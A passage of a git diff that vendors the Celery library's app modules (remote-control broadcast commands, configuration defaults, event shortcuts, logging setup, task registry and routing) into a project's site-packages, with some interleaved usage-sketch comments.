same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'pool_grow', arguments={'n': n}, destination=destination, **kwargs) + + def pool_shrink(self, n=1, destination=None, **kwargs): + """Tell all (or specific) workers to shrink the pool by ``n``. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'pool_shrink', arguments={'n': n}, + destination=destination, **kwargs) + + def autoscale(self, max, min, destination=None, **kwargs): + """Change worker(s) autoscale setting. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'autoscale', arguments={'max': max, 'min': min}, + destination=destination, **kwargs) + + def shutdown(self, destination=None, **kwargs): + """Shutdown worker(s). + + See Also: + Supports the same arguments as :meth:`broadcast` + """ + return self.broadcast( + 'shutdown', arguments={}, destination=destination, **kwargs) + + def pool_restart(self, modules=None, reload=False, reloader=None, + destination=None, **kwargs): + """Restart the execution pools of all or specific workers. + + Keyword Arguments: + modules (Sequence[str]): List of modules to reload. + reload (bool): Flag to enable module reloading. Default is False. + reloader (Any): Function to reload a module. + destination (Sequence[str]): List of worker names to send this + command to. 
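# NOTE (editor's sketch, not part of the vendored diff): queue and pool
# management with the commands defined above.  Reuses the `app` instance
# from the first sketch; queue, task and worker names are placeholders.
app.control.add_consumer('feeds', destination=['worker1@example.com'])
app.control.cancel_consumer('feeds')
app.control.pool_grow(2)                        # add two pool processes
app.control.autoscale(max=10, min=3)            # adjust autoscaler bounds
app.control.time_limit('proj.tasks.crawl', soft=60, hard=120)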
+ + See Also: + Supports the same arguments as :meth:`broadcast` + """ + return self.broadcast( + 'pool_restart', + arguments={ + 'modules': modules, + 'reload': reload, + 'reloader': reloader, + }, + destination=destination, **kwargs) + + def heartbeat(self, destination=None, **kwargs): + """Tell worker(s) to send a heartbeat immediately. + + See Also: + Supports the same arguments as :meth:`broadcast` + """ + return self.broadcast( + 'heartbeat', arguments={}, destination=destination, **kwargs) + + def broadcast(self, command, arguments=None, destination=None, + connection=None, reply=False, timeout=1.0, limit=None, + callback=None, channel=None, pattern=None, matcher=None, + **extra_kwargs): + """Broadcast a control command to the celery workers. + + Arguments: + command (str): Name of command to send. + arguments (Dict): Keyword arguments for the command. + destination (List): If set, a list of the hosts to send the + command to, when empty broadcast to all workers. + connection (kombu.Connection): Custom broker connection to use, + if not set, a connection will be acquired from the pool. + reply (bool): Wait for and return the reply. + timeout (float): Timeout in seconds to wait for the reply. + limit (int): Limit number of replies. + callback (Callable): Callback called immediately for + each reply received. + pattern (str): Custom pattern string to match + matcher (Callable): Custom matcher to run the pattern to match + """ + with self.app.connection_or_acquire(connection) as conn: + arguments = dict(arguments or {}, **extra_kwargs) + if pattern and matcher: + # tests pass easier without requiring pattern/matcher to + # always be sent in + return self.mailbox(conn)._broadcast( + command, arguments, destination, reply, timeout, + limit, callback, channel=channel, + pattern=pattern, matcher=matcher, + ) + else: + return self.mailbox(conn)._broadcast( + command, arguments, destination, reply, timeout, + limit, callback, channel=channel, + ) diff --git a/env/Lib/site-packages/celery/app/defaults.py b/env/Lib/site-packages/celery/app/defaults.py new file mode 100644 index 00000000..a9f68689 --- /dev/null +++ b/env/Lib/site-packages/celery/app/defaults.py @@ -0,0 +1,414 @@ +"""Configuration introspection and defaults.""" +from collections import deque, namedtuple +from datetime import timedelta + +from celery.utils.functional import memoize +from celery.utils.serialization import strtobool + +__all__ = ('Option', 'NAMESPACES', 'flatten', 'find') + + +DEFAULT_POOL = 'prefork' + +DEFAULT_ACCEPT_CONTENT = ('json',) +DEFAULT_PROCESS_LOG_FMT = """ + [%(asctime)s: %(levelname)s/%(processName)s] %(message)s +""".strip() +DEFAULT_TASK_LOG_FMT = """[%(asctime)s: %(levelname)s/%(processName)s] \ +%(task_name)s[%(task_id)s]: %(message)s""" + +DEFAULT_SECURITY_DIGEST = 'sha256' + + +OLD_NS = {'celery_{0}'} +OLD_NS_BEAT = {'celerybeat_{0}'} +OLD_NS_WORKER = {'celeryd_{0}'} + +searchresult = namedtuple('searchresult', ('namespace', 'key', 'type')) + + +def Namespace(__old__=None, **options): + if __old__ is not None: + for key, opt in options.items(): + if not opt.old: + opt.old = {o.format(key) for o in __old__} + return options + + +def old_ns(ns): + return {f'{ns}_{{0}}'} + + +class Option: + """Describes a Celery configuration option.""" + + alt = None + deprecate_by = None + remove_by = None + old = set() + typemap = {'string': str, 'int': int, 'float': float, 'any': lambda v: v, + 'bool': strtobool, 'dict': dict, 'tuple': tuple} + + def __init__(self, default=None, *args, **kwargs): + 
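# NOTE (editor's sketch, not part of the vendored diff): every helper above
# ultimately calls Control.broadcast(), which can also be used directly.
# Reuses the `app` instance from the first sketch; the worker name is a
# placeholder.
replies = app.control.broadcast(
    'ping', reply=True, timeout=1.0, limit=1,
    destination=['worker1@example.com'],
)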
self.default = default + self.type = kwargs.get('type') or 'string' + for attr, value in kwargs.items(): + setattr(self, attr, value) + + def to_python(self, value): + return self.typemap[self.type](value) + + def __repr__(self): + return '{} default->{!r}>'.format(self.type, + self.default) + + +NAMESPACES = Namespace( + accept_content=Option(DEFAULT_ACCEPT_CONTENT, type='list', old=OLD_NS), + result_accept_content=Option(None, type='list'), + enable_utc=Option(True, type='bool'), + imports=Option((), type='tuple', old=OLD_NS), + include=Option((), type='tuple', old=OLD_NS), + timezone=Option(type='string', old=OLD_NS), + beat=Namespace( + __old__=OLD_NS_BEAT, + + max_loop_interval=Option(0, type='float'), + schedule=Option({}, type='dict'), + scheduler=Option('celery.beat:PersistentScheduler'), + schedule_filename=Option('celerybeat-schedule'), + sync_every=Option(0, type='int'), + cron_starting_deadline=Option(None, type=int) + ), + broker=Namespace( + url=Option(None, type='string'), + read_url=Option(None, type='string'), + write_url=Option(None, type='string'), + transport=Option(type='string'), + transport_options=Option({}, type='dict'), + connection_timeout=Option(4, type='float'), + connection_retry=Option(True, type='bool'), + connection_retry_on_startup=Option(None, type='bool'), + connection_max_retries=Option(100, type='int'), + channel_error_retry=Option(False, type='bool'), + failover_strategy=Option(None, type='string'), + heartbeat=Option(120, type='int'), + heartbeat_checkrate=Option(3.0, type='int'), + login_method=Option(None, type='string'), + pool_limit=Option(10, type='int'), + use_ssl=Option(False, type='bool'), + + host=Option(type='string'), + port=Option(type='int'), + user=Option(type='string'), + password=Option(type='string'), + vhost=Option(type='string'), + ), + cache=Namespace( + __old__=old_ns('celery_cache'), + + backend=Option(), + backend_options=Option({}, type='dict'), + ), + cassandra=Namespace( + entry_ttl=Option(type='float'), + keyspace=Option(type='string'), + port=Option(type='string'), + read_consistency=Option(type='string'), + servers=Option(type='list'), + bundle_path=Option(type='string'), + table=Option(type='string'), + write_consistency=Option(type='string'), + auth_provider=Option(type='string'), + auth_kwargs=Option(type='string'), + options=Option({}, type='dict'), + ), + s3=Namespace( + access_key_id=Option(type='string'), + secret_access_key=Option(type='string'), + bucket=Option(type='string'), + base_path=Option(type='string'), + endpoint_url=Option(type='string'), + region=Option(type='string'), + ), + azureblockblob=Namespace( + container_name=Option('celery', type='string'), + retry_initial_backoff_sec=Option(2, type='int'), + retry_increment_base=Option(2, type='int'), + retry_max_attempts=Option(3, type='int'), + base_path=Option('', type='string'), + connection_timeout=Option(20, type='int'), + read_timeout=Option(120, type='int'), + ), + control=Namespace( + queue_ttl=Option(300.0, type='float'), + queue_expires=Option(10.0, type='float'), + exchange=Option('celery', type='string'), + ), + couchbase=Namespace( + __old__=old_ns('celery_couchbase'), + + backend_settings=Option(None, type='dict'), + ), + arangodb=Namespace( + __old__=old_ns('celery_arangodb'), + backend_settings=Option(None, type='dict') + ), + mongodb=Namespace( + __old__=old_ns('celery_mongodb'), + + backend_settings=Option(type='dict'), + ), + cosmosdbsql=Namespace( + database_name=Option('celerydb', type='string'), + collection_name=Option('celerycol', 
type='string'), + consistency_level=Option('Session', type='string'), + max_retry_attempts=Option(9, type='int'), + max_retry_wait_time=Option(30, type='int'), + ), + event=Namespace( + __old__=old_ns('celery_event'), + + queue_expires=Option(60.0, type='float'), + queue_ttl=Option(5.0, type='float'), + queue_prefix=Option('celeryev'), + serializer=Option('json'), + exchange=Option('celeryev', type='string'), + ), + redis=Namespace( + __old__=old_ns('celery_redis'), + + backend_use_ssl=Option(type='dict'), + db=Option(type='int'), + host=Option(type='string'), + max_connections=Option(type='int'), + username=Option(type='string'), + password=Option(type='string'), + port=Option(type='int'), + socket_timeout=Option(120.0, type='float'), + socket_connect_timeout=Option(None, type='float'), + retry_on_timeout=Option(False, type='bool'), + socket_keepalive=Option(False, type='bool'), + ), + result=Namespace( + __old__=old_ns('celery_result'), + + backend=Option(type='string'), + cache_max=Option( + -1, + type='int', old={'celery_max_cached_results'}, + ), + compression=Option(type='str'), + exchange=Option('celeryresults'), + exchange_type=Option('direct'), + expires=Option( + timedelta(days=1), + type='float', old={'celery_task_result_expires'}, + ), + persistent=Option(None, type='bool'), + extended=Option(False, type='bool'), + serializer=Option('json'), + backend_transport_options=Option({}, type='dict'), + chord_retry_interval=Option(1.0, type='float'), + chord_join_timeout=Option(3.0, type='float'), + backend_max_sleep_between_retries_ms=Option(10000, type='int'), + backend_max_retries=Option(float("inf"), type='float'), + backend_base_sleep_between_retries_ms=Option(10, type='int'), + backend_always_retry=Option(False, type='bool'), + ), + elasticsearch=Namespace( + __old__=old_ns('celery_elasticsearch'), + + retry_on_timeout=Option(type='bool'), + max_retries=Option(type='int'), + timeout=Option(type='float'), + save_meta_as_text=Option(True, type='bool'), + ), + security=Namespace( + __old__=old_ns('celery_security'), + + certificate=Option(type='string'), + cert_store=Option(type='string'), + key=Option(type='string'), + key_password=Option(type='bytes'), + digest=Option(DEFAULT_SECURITY_DIGEST, type='string'), + ), + database=Namespace( + url=Option(old={'celery_result_dburi'}), + engine_options=Option( + type='dict', old={'celery_result_engine_options'}, + ), + short_lived_sessions=Option( + False, type='bool', old={'celery_result_db_short_lived_sessions'}, + ), + table_schemas=Option(type='dict'), + table_names=Option(type='dict', old={'celery_result_db_tablenames'}), + ), + task=Namespace( + __old__=OLD_NS, + acks_late=Option(False, type='bool'), + acks_on_failure_or_timeout=Option(True, type='bool'), + always_eager=Option(False, type='bool'), + annotations=Option(type='any'), + compression=Option(type='string', old={'celery_message_compression'}), + create_missing_queues=Option(True, type='bool'), + inherit_parent_priority=Option(False, type='bool'), + default_delivery_mode=Option(2, type='string'), + default_queue=Option('celery'), + default_exchange=Option(None, type='string'), # taken from queue + default_exchange_type=Option('direct'), + default_routing_key=Option(None, type='string'), # taken from queue + default_rate_limit=Option(type='string'), + default_priority=Option(None, type='string'), + eager_propagates=Option( + False, type='bool', old={'celery_eager_propagates_exceptions'}, + ), + ignore_result=Option(False, type='bool'), + store_eager_result=Option(False, 
type='bool'), + protocol=Option(2, type='int', old={'celery_task_protocol'}), + publish_retry=Option( + True, type='bool', old={'celery_task_publish_retry'}, + ), + publish_retry_policy=Option( + {'max_retries': 3, + 'interval_start': 0, + 'interval_max': 1, + 'interval_step': 0.2}, + type='dict', old={'celery_task_publish_retry_policy'}, + ), + queues=Option(type='dict'), + queue_max_priority=Option(None, type='int'), + reject_on_worker_lost=Option(type='bool'), + remote_tracebacks=Option(False, type='bool'), + routes=Option(type='any'), + send_sent_event=Option( + False, type='bool', old={'celery_send_task_sent_event'}, + ), + serializer=Option('json', old={'celery_task_serializer'}), + soft_time_limit=Option( + type='float', old={'celeryd_task_soft_time_limit'}, + ), + time_limit=Option( + type='float', old={'celeryd_task_time_limit'}, + ), + store_errors_even_if_ignored=Option(False, type='bool'), + track_started=Option(False, type='bool'), + allow_error_cb_on_chord_header=Option(False, type='bool'), + ), + worker=Namespace( + __old__=OLD_NS_WORKER, + agent=Option(None, type='string'), + autoscaler=Option('celery.worker.autoscale:Autoscaler'), + cancel_long_running_tasks_on_connection_loss=Option( + False, type='bool' + ), + concurrency=Option(None, type='int'), + consumer=Option('celery.worker.consumer:Consumer', type='string'), + direct=Option(False, type='bool', old={'celery_worker_direct'}), + disable_rate_limits=Option( + False, type='bool', old={'celery_disable_rate_limits'}, + ), + deduplicate_successful_tasks=Option( + False, type='bool' + ), + enable_remote_control=Option( + True, type='bool', old={'celery_enable_remote_control'}, + ), + hijack_root_logger=Option(True, type='bool'), + log_color=Option(type='bool'), + log_format=Option(DEFAULT_PROCESS_LOG_FMT), + lost_wait=Option(10.0, type='float', old={'celeryd_worker_lost_wait'}), + max_memory_per_child=Option(type='int'), + max_tasks_per_child=Option(type='int'), + pool=Option(DEFAULT_POOL), + pool_putlocks=Option(True, type='bool'), + pool_restarts=Option(False, type='bool'), + proc_alive_timeout=Option(4.0, type='float'), + prefetch_multiplier=Option(4, type='int'), + redirect_stdouts=Option( + True, type='bool', old={'celery_redirect_stdouts'}, + ), + redirect_stdouts_level=Option( + 'WARNING', old={'celery_redirect_stdouts_level'}, + ), + send_task_events=Option( + False, type='bool', old={'celery_send_events'}, + ), + state_db=Option(), + task_log_format=Option(DEFAULT_TASK_LOG_FMT), + timer=Option(type='string'), + timer_precision=Option(1.0, type='float'), + ), +) + + +def _flatten_keys(ns, key, opt): + return [(ns + key, opt)] + + +def _to_compat(ns, key, opt): + if opt.old: + return [ + (oldkey.format(key).upper(), ns + key, opt) + for oldkey in opt.old + ] + return [((ns + key).upper(), ns + key, opt)] + + +def flatten(d, root='', keyfilter=_flatten_keys): + """Flatten settings.""" + stack = deque([(root, d)]) + while stack: + ns, options = stack.popleft() + for key, opt in options.items(): + if isinstance(opt, dict): + stack.append((ns + key + '_', opt)) + else: + yield from keyfilter(ns, key, opt) + + +DEFAULTS = { + key: opt.default for key, opt in flatten(NAMESPACES) +} +__compat = list(flatten(NAMESPACES, keyfilter=_to_compat)) +_OLD_DEFAULTS = {old_key: opt.default for old_key, _, opt in __compat} +_TO_OLD_KEY = {new_key: old_key for old_key, new_key, _ in __compat} +_TO_NEW_KEY = {old_key: new_key for old_key, new_key, _ in __compat} +__compat = None + +SETTING_KEYS = set(DEFAULTS.keys()) +_OLD_SETTING_KEYS 
= set(_TO_NEW_KEY.keys()) + + +def find_deprecated_settings(source): # pragma: no cover + from celery.utils import deprecated + for name, opt in flatten(NAMESPACES): + if (opt.deprecate_by or opt.remove_by) and getattr(source, name, None): + deprecated.warn(description=f'The {name!r} setting', + deprecation=opt.deprecate_by, + removal=opt.remove_by, + alternative=f'Use the {opt.alt} instead') + return source + + +@memoize(maxsize=None) +def find(name, namespace='celery'): + """Find setting by name.""" + # - Try specified name-space first. + namespace = namespace.lower() + try: + return searchresult( + namespace, name.lower(), NAMESPACES[namespace][name.lower()], + ) + except KeyError: + # - Try all the other namespaces. + for ns, opts in NAMESPACES.items(): + if ns.lower() == name.lower(): + return searchresult(None, ns, opts) + elif isinstance(opts, dict): + try: + return searchresult(ns, name.lower(), opts[name.lower()]) + except KeyError: + pass + # - See if name is a qualname last. + return searchresult(None, name.lower(), DEFAULTS[name.lower()]) diff --git a/env/Lib/site-packages/celery/app/events.py b/env/Lib/site-packages/celery/app/events.py new file mode 100644 index 00000000..f2ebea06 --- /dev/null +++ b/env/Lib/site-packages/celery/app/events.py @@ -0,0 +1,40 @@ +"""Implementation for the app.events shortcuts.""" +from contextlib import contextmanager + +from kombu.utils.objects import cached_property + + +class Events: + """Implements app.events.""" + + receiver_cls = 'celery.events.receiver:EventReceiver' + dispatcher_cls = 'celery.events.dispatcher:EventDispatcher' + state_cls = 'celery.events.state:State' + + def __init__(self, app=None): + self.app = app + + @cached_property + def Receiver(self): + return self.app.subclass_with_self( + self.receiver_cls, reverse='events.Receiver') + + @cached_property + def Dispatcher(self): + return self.app.subclass_with_self( + self.dispatcher_cls, reverse='events.Dispatcher') + + @cached_property + def State(self): + return self.app.subclass_with_self( + self.state_cls, reverse='events.State') + + @contextmanager + def default_dispatcher(self, hostname=None, enabled=True, + buffer_while_offline=False): + with self.app.amqp.producer_pool.acquire(block=True) as prod: + # pylint: disable=too-many-function-args + # This is a property pylint... + with self.Dispatcher(prod.connection, hostname, enabled, + prod.channel, buffer_while_offline) as d: + yield d diff --git a/env/Lib/site-packages/celery/app/log.py b/env/Lib/site-packages/celery/app/log.py new file mode 100644 index 00000000..4c807f4e --- /dev/null +++ b/env/Lib/site-packages/celery/app/log.py @@ -0,0 +1,247 @@ +"""Logging configuration. + +The Celery instances logging section: ``Celery.log``. + +Sets up logging for the worker and other programs, +redirects standard outs, colors log output, patches logging +related compatibility fixes, and so on. 
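# NOTE (editor's sketch, not part of the vendored diff): how the
# introspection helpers above fit together, assuming this vendored copy
# matches the released celery package.  flatten() yields flat setting names,
# DEFAULTS maps them to default values, and find() reports the namespace an
# option belongs to.
from celery.app.defaults import DEFAULTS, NAMESPACES, find, flatten

assert DEFAULTS['task_default_queue'] == 'celery'
assert DEFAULTS['worker_prefetch_multiplier'] == 4

ns, key, opt = find('default_queue')   # searchresult('task', 'default_queue', <Option>)
print(ns, key, opt.default)

for name, option in flatten(NAMESPACES):
    print(name, option.type, option.default)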
+""" +import logging +import os +import sys +import warnings +from logging.handlers import WatchedFileHandler + +from kombu.utils.encoding import set_default_encoding_file + +from celery import signals +from celery._state import get_current_task +from celery.exceptions import CDeprecationWarning, CPendingDeprecationWarning +from celery.local import class_property +from celery.utils.log import (ColorFormatter, LoggingProxy, get_logger, get_multiprocessing_logger, mlevel, + reset_multiprocessing_logger) +from celery.utils.nodenames import node_format +from celery.utils.term import colored + +__all__ = ('TaskFormatter', 'Logging') + +MP_LOG = os.environ.get('MP_LOG', False) + + +class TaskFormatter(ColorFormatter): + """Formatter for tasks, adding the task name and id.""" + + def format(self, record): + task = get_current_task() + if task and task.request: + record.__dict__.update(task_id=task.request.id, + task_name=task.name) + else: + record.__dict__.setdefault('task_name', '???') + record.__dict__.setdefault('task_id', '???') + return super().format(record) + + +class Logging: + """Application logging setup (app.log).""" + + #: The logging subsystem is only configured once per process. + #: setup_logging_subsystem sets this flag, and subsequent calls + #: will do nothing. + _setup = False + + def __init__(self, app): + self.app = app + self.loglevel = mlevel(logging.WARN) + self.format = self.app.conf.worker_log_format + self.task_format = self.app.conf.worker_task_log_format + self.colorize = self.app.conf.worker_log_color + + def setup(self, loglevel=None, logfile=None, redirect_stdouts=False, + redirect_level='WARNING', colorize=None, hostname=None): + loglevel = mlevel(loglevel) + handled = self.setup_logging_subsystem( + loglevel, logfile, colorize=colorize, hostname=hostname, + ) + if not handled and redirect_stdouts: + self.redirect_stdouts(redirect_level) + os.environ.update( + CELERY_LOG_LEVEL=str(loglevel) if loglevel else '', + CELERY_LOG_FILE=str(logfile) if logfile else '', + ) + warnings.filterwarnings('always', category=CDeprecationWarning) + warnings.filterwarnings('always', category=CPendingDeprecationWarning) + logging.captureWarnings(True) + return handled + + def redirect_stdouts(self, loglevel=None, name='celery.redirected'): + self.redirect_stdouts_to_logger( + get_logger(name), loglevel=loglevel + ) + os.environ.update( + CELERY_LOG_REDIRECT='1', + CELERY_LOG_REDIRECT_LEVEL=str(loglevel or ''), + ) + + def setup_logging_subsystem(self, loglevel=None, logfile=None, format=None, + colorize=None, hostname=None, **kwargs): + if self.already_setup: + return + if logfile and hostname: + logfile = node_format(logfile, hostname) + Logging._setup = True + loglevel = mlevel(loglevel or self.loglevel) + format = format or self.format + colorize = self.supports_color(colorize, logfile) + reset_multiprocessing_logger() + receivers = signals.setup_logging.send( + sender=None, loglevel=loglevel, logfile=logfile, + format=format, colorize=colorize, + ) + + if not receivers: + root = logging.getLogger() + + if self.app.conf.worker_hijack_root_logger: + root.handlers = [] + get_logger('celery').handlers = [] + get_logger('celery.task').handlers = [] + get_logger('celery.redirected').handlers = [] + + # Configure root logger + self._configure_logger( + root, logfile, loglevel, format, colorize, **kwargs + ) + + # Configure the multiprocessing logger + self._configure_logger( + get_multiprocessing_logger(), + logfile, loglevel if MP_LOG else logging.ERROR, + format, colorize, **kwargs 
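# NOTE (editor's sketch, not part of the vendored diff): TaskFormatter
# (defined above) adds task_name/task_id to records logged from inside a
# running task; outside a task they fall back to '???'.
import logging
from celery.app.log import TaskFormatter

handler = logging.StreamHandler()
handler.setFormatter(TaskFormatter(
    '[%(asctime)s: %(levelname)s] %(task_name)s[%(task_id)s] %(message)s'))
logging.getLogger('celery.task').addHandler(handler)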
+ ) + + signals.after_setup_logger.send( + sender=None, logger=root, + loglevel=loglevel, logfile=logfile, + format=format, colorize=colorize, + ) + + # then setup the root task logger. + self.setup_task_loggers(loglevel, logfile, colorize=colorize) + + try: + stream = logging.getLogger().handlers[0].stream + except (AttributeError, IndexError): + pass + else: + set_default_encoding_file(stream) + + # This is a hack for multiprocessing's fork+exec, so that + # logging before Process.run works. + logfile_name = logfile if isinstance(logfile, str) else '' + os.environ.update(_MP_FORK_LOGLEVEL_=str(loglevel), + _MP_FORK_LOGFILE_=logfile_name, + _MP_FORK_LOGFORMAT_=format) + return receivers + + def _configure_logger(self, logger, logfile, loglevel, + format, colorize, **kwargs): + if logger is not None: + self.setup_handlers(logger, logfile, format, + colorize, **kwargs) + if loglevel: + logger.setLevel(loglevel) + + def setup_task_loggers(self, loglevel=None, logfile=None, format=None, + colorize=None, propagate=False, **kwargs): + """Setup the task logger. + + If `logfile` is not specified, then `sys.stderr` is used. + + Will return the base task logger object. + """ + loglevel = mlevel(loglevel or self.loglevel) + format = format or self.task_format + colorize = self.supports_color(colorize, logfile) + + logger = self.setup_handlers( + get_logger('celery.task'), + logfile, format, colorize, + formatter=TaskFormatter, **kwargs + ) + logger.setLevel(loglevel) + # this is an int for some reason, better to not question why. + logger.propagate = int(propagate) + signals.after_setup_task_logger.send( + sender=None, logger=logger, + loglevel=loglevel, logfile=logfile, + format=format, colorize=colorize, + ) + return logger + + def redirect_stdouts_to_logger(self, logger, loglevel=None, + stdout=True, stderr=True): + """Redirect :class:`sys.stdout` and :class:`sys.stderr` to logger. + + Arguments: + logger (logging.Logger): Logger instance to redirect to. + loglevel (int, str): The loglevel redirected message + will be logged as. + """ + proxy = LoggingProxy(logger, loglevel) + if stdout: + sys.stdout = proxy + if stderr: + sys.stderr = proxy + return proxy + + def supports_color(self, colorize=None, logfile=None): + colorize = self.colorize if colorize is None else colorize + if self.app.IS_WINDOWS: + # Windows does not support ANSI color codes. + return False + if colorize or colorize is None: + # Only use color if there's no active log file + # and stderr is an actual terminal. 
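# NOTE (editor's sketch, not part of the vendored diff):
# redirect_stdouts_to_logger() (defined above) swaps sys.stdout/sys.stderr
# for a LoggingProxy.  Reuses the `app` instance from the first sketch.
import logging

logger = logging.getLogger('celery.redirected')
app.log.redirect_stdouts_to_logger(logger, loglevel=logging.WARNING)
print('this line is now written to the logger instead of stdout')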
+ return logfile is None and sys.stderr.isatty() + return colorize + + def colored(self, logfile=None, enabled=None): + return colored(enabled=self.supports_color(enabled, logfile)) + + def setup_handlers(self, logger, logfile, format, colorize, + formatter=ColorFormatter, **kwargs): + if self._is_configured(logger): + return logger + handler = self._detect_handler(logfile) + handler.setFormatter(formatter(format, use_color=colorize)) + logger.addHandler(handler) + return logger + + def _detect_handler(self, logfile=None): + """Create handler from filename, an open stream or `None` (stderr).""" + logfile = sys.__stderr__ if logfile is None else logfile + if hasattr(logfile, 'write'): + return logging.StreamHandler(logfile) + return WatchedFileHandler(logfile, encoding='utf-8') + + def _has_handler(self, logger): + return any( + not isinstance(h, logging.NullHandler) + for h in logger.handlers or [] + ) + + def _is_configured(self, logger): + return self._has_handler(logger) and not getattr( + logger, '_rudimentary_setup', False) + + def get_default_logger(self, name='celery', **kwargs): + return get_logger(name) + + @class_property + def already_setup(self): + return self._setup + + @already_setup.setter + def already_setup(self, was_setup): + self._setup = was_setup diff --git a/env/Lib/site-packages/celery/app/registry.py b/env/Lib/site-packages/celery/app/registry.py new file mode 100644 index 00000000..707567d1 --- /dev/null +++ b/env/Lib/site-packages/celery/app/registry.py @@ -0,0 +1,68 @@ +"""Registry of available tasks.""" +import inspect +from importlib import import_module + +from celery._state import get_current_app +from celery.app.autoretry import add_autoretry_behaviour +from celery.exceptions import InvalidTaskError, NotRegistered + +__all__ = ('TaskRegistry',) + + +class TaskRegistry(dict): + """Map of registered tasks.""" + + NotRegistered = NotRegistered + + def __missing__(self, key): + raise self.NotRegistered(key) + + def register(self, task): + """Register a task in the task registry. + + The task will be automatically instantiated if not already an + instance. Name must be configured prior to registration. + """ + if task.name is None: + raise InvalidTaskError( + 'Task class {!r} must specify .name attribute'.format( + type(task).__name__)) + task = inspect.isclass(task) and task() or task + add_autoretry_behaviour(task) + self[task.name] = task + + def unregister(self, name): + """Unregister task by name. + + Arguments: + name (str): name of the task to unregister, or a + :class:`celery.app.task.Task` with a valid `name` attribute. + + Raises: + celery.exceptions.NotRegistered: if the task is not registered. + """ + try: + self.pop(getattr(name, 'name', name)) + except KeyError: + raise self.NotRegistered(name) + + # -- these methods are irrelevant now and will be removed in 4.0 + def regular(self): + return self.filter_types('regular') + + def periodic(self): + return self.filter_types('periodic') + + def filter_types(self, type): + return {name: task for name, task in self.items() + if getattr(task, 'type', 'regular') == type} + + +def _unpickle_task(name): + return get_current_app().tasks[name] + + +def _unpickle_task_v2(name, module=None): + if module: + import_module(module) + return get_current_app().tasks[name] diff --git a/env/Lib/site-packages/celery/app/routes.py b/env/Lib/site-packages/celery/app/routes.py new file mode 100644 index 00000000..a56ce59e --- /dev/null +++ b/env/Lib/site-packages/celery/app/routes.py @@ -0,0 +1,136 @@ +"""Task Routing. 
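# NOTE (editor's sketch, not part of the vendored diff): the TaskRegistry
# above is what an application exposes as app.tasks; @app.task registers
# into it and unregister() removes entries by name.  'proj' is a placeholder
# app name.
from celery import Celery

app = Celery('proj')

@app.task(name='proj.add')
def add(x, y):
    return x + y

assert 'proj.add' in app.tasks          # TaskRegistry is a dict subclass
# app.tasks.unregister('proj.add')      # would remove it; NotRegistered if absent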
+ +Contains utilities for working with task routers, (:setting:`task_routes`). +""" +import fnmatch +import re +from collections import OrderedDict +from collections.abc import Mapping + +from kombu import Queue + +from celery.exceptions import QueueNotFound +from celery.utils.collections import lpmerge +from celery.utils.functional import maybe_evaluate, mlazy +from celery.utils.imports import symbol_by_name + +try: + Pattern = re._pattern_type +except AttributeError: # pragma: no cover + # for support Python 3.7 + Pattern = re.Pattern + +__all__ = ('MapRoute', 'Router', 'prepare') + + +class MapRoute: + """Creates a router out of a :class:`dict`.""" + + def __init__(self, map): + map = map.items() if isinstance(map, Mapping) else map + self.map = {} + self.patterns = OrderedDict() + for k, v in map: + if isinstance(k, Pattern): + self.patterns[k] = v + elif '*' in k: + self.patterns[re.compile(fnmatch.translate(k))] = v + else: + self.map[k] = v + + def __call__(self, name, *args, **kwargs): + try: + return dict(self.map[name]) + except KeyError: + pass + except ValueError: + return {'queue': self.map[name]} + for regex, route in self.patterns.items(): + if regex.match(name): + try: + return dict(route) + except ValueError: + return {'queue': route} + + +class Router: + """Route tasks based on the :setting:`task_routes` setting.""" + + def __init__(self, routes=None, queues=None, + create_missing=False, app=None): + self.app = app + self.queues = {} if queues is None else queues + self.routes = [] if routes is None else routes + self.create_missing = create_missing + + def route(self, options, name, args=(), kwargs=None, task_type=None): + kwargs = {} if not kwargs else kwargs + options = self.expand_destination(options) # expands 'queue' + if self.routes: + route = self.lookup_route(name, args, kwargs, options, task_type) + if route: # expands 'queue' in route. + return lpmerge(self.expand_destination(route), options) + if 'queue' not in options: + options = lpmerge(self.expand_destination( + self.app.conf.task_default_queue), options) + return options + + def expand_destination(self, route): + # Route can be a queue name: convenient for direct exchanges. + if isinstance(route, str): + queue, route = route, {} + else: + # can use defaults from configured queue, but override specific + # things (like the routing_key): great for topic exchanges. 
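# NOTE (editor's sketch, not part of the vendored diff): MapRoute (defined
# above) is what task_routes dictionaries are compiled into; exact names,
# glob patterns and bare queue-name strings are all accepted.
from celery.app.routes import MapRoute

route = MapRoute({
    'feed.tasks.*': {'queue': 'feeds'},   # glob pattern
    'video.compress': 'media',            # bare string: just a queue name
})
assert route('feed.tasks.import_feed') == {'queue': 'feeds'}
assert route('video.compress') == {'queue': 'media'}
assert route('unrelated.task') is None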
+ queue = route.pop('queue', None) + + if queue: + if isinstance(queue, Queue): + route['queue'] = queue + else: + try: + route['queue'] = self.queues[queue] + except KeyError: + raise QueueNotFound( + f'Queue {queue!r} missing from task_queues') + return route + + def lookup_route(self, name, + args=None, kwargs=None, options=None, task_type=None): + query = self.query_router + for router in self.routes: + route = query(router, name, args, kwargs, options, task_type) + if route is not None: + return route + + def query_router(self, router, task, args, kwargs, options, task_type): + router = maybe_evaluate(router) + if hasattr(router, 'route_for_task'): + # pre 4.0 router class + return router.route_for_task(task, args, kwargs) + return router(task, args, kwargs, options, task=task_type) + + +def expand_router_string(router): + router = symbol_by_name(router) + if hasattr(router, 'route_for_task'): + # need to instantiate pre 4.0 router classes + router = router() + return router + + +def prepare(routes): + """Expand the :setting:`task_routes` setting.""" + + def expand_route(route): + if isinstance(route, (Mapping, list, tuple)): + return MapRoute(route) + if isinstance(route, str): + return mlazy(expand_router_string, route) + return route + + if routes is None: + return () + if not isinstance(routes, (list, tuple)): + routes = (routes,) + return [expand_route(route) for route in routes] diff --git a/env/Lib/site-packages/celery/app/task.py b/env/Lib/site-packages/celery/app/task.py new file mode 100644 index 00000000..7998d600 --- /dev/null +++ b/env/Lib/site-packages/celery/app/task.py @@ -0,0 +1,1144 @@ +"""Task implementation: request context and the task base class.""" +import sys + +from billiard.einfo import ExceptionInfo, ExceptionWithTraceback +from kombu import serialization +from kombu.exceptions import OperationalError +from kombu.utils.uuid import uuid + +from celery import current_app, states +from celery._state import _task_stack +from celery.canvas import _chain, group, signature +from celery.exceptions import Ignore, ImproperlyConfigured, MaxRetriesExceededError, Reject, Retry +from celery.local import class_property +from celery.result import EagerResult, denied_join_result +from celery.utils import abstract +from celery.utils.functional import mattrgetter, maybe_list +from 